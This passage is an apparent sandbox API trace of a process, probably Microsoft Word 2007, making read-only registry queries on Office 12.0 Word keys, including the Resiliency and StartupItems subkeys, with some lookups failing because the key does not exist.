[0085.261] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.261] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x35c) returned 0x0
[0085.261] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.261] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.261] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.261] RegCloseKey (hKey=0x35c) returned 0x0
[0085.261] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.261] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x35c) returned 0x0
[0085.261] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.261] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0085.261] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a4) returned 0x0
[0085.262] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.262] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.262] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.262] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.262] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a4) returned 0x0
[0085.262] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.263] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a4) returned 0x0
[0085.264] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a4) returned 0x0
[0085.265] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.265] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x3a4) returned 0x0
[0085.265] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.265] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0085.265] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.265] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3a4) returned 0x0
[0085.265] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.265] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x360) returned 0x0
[0085.265] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.265] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3a4) returned 0x0
[0085.266] RegCloseKey (hKey=0x360) returned 0x0
[0085.266] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.266] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x360) returned 0x0
[0085.266] RegCloseKey (hKey=0x3a4) returned 0x0
[0085.266] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3a4) returned 0x0
[0085.266] RegCloseKey (hKey=0x360) returned 0x0
[0085.266] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.266] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.266] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.266] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x360) returned 0x0
[0085.266] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x364) returned 0x0
[0085.266] RegCloseKey (hKey=0x360) returned 0x0
[0085.266] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.267] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x360) returned 0x0
[0085.267] RegCloseKey (hKey=0x364) returned 0x0
[0085.267] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.267] RegOpenKeyExW (in: hKey=0x360, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x364) returned 0x0
[0085.267] RegCloseKey (hKey=0x360) returned 0x0
[0085.267] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.267] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x360) returned 0x0
[0085.267] RegCloseKey (hKey=0x364) returned 0x0
[0085.267] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.267] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.267] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.267] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0085.267] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.267] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x364) returned 0x0
[0085.268] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.268] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x368) returned 0x0
[0085.268] RegCloseKey (hKey=0x364) returned 0x0
[0085.268] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.268] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x364) returned 0x0
[0085.268] RegCloseKey (hKey=0x368) returned 0x0
[0085.268] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.268] RegOpenKeyExW (in: hKey=0x364, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x368) returned 0x0
[0085.268] RegCloseKey (hKey=0x364) returned 0x0
[0085.268] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.268] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x364) returned 0x0
[0085.268] RegCloseKey (hKey=0x368) returned 0x0
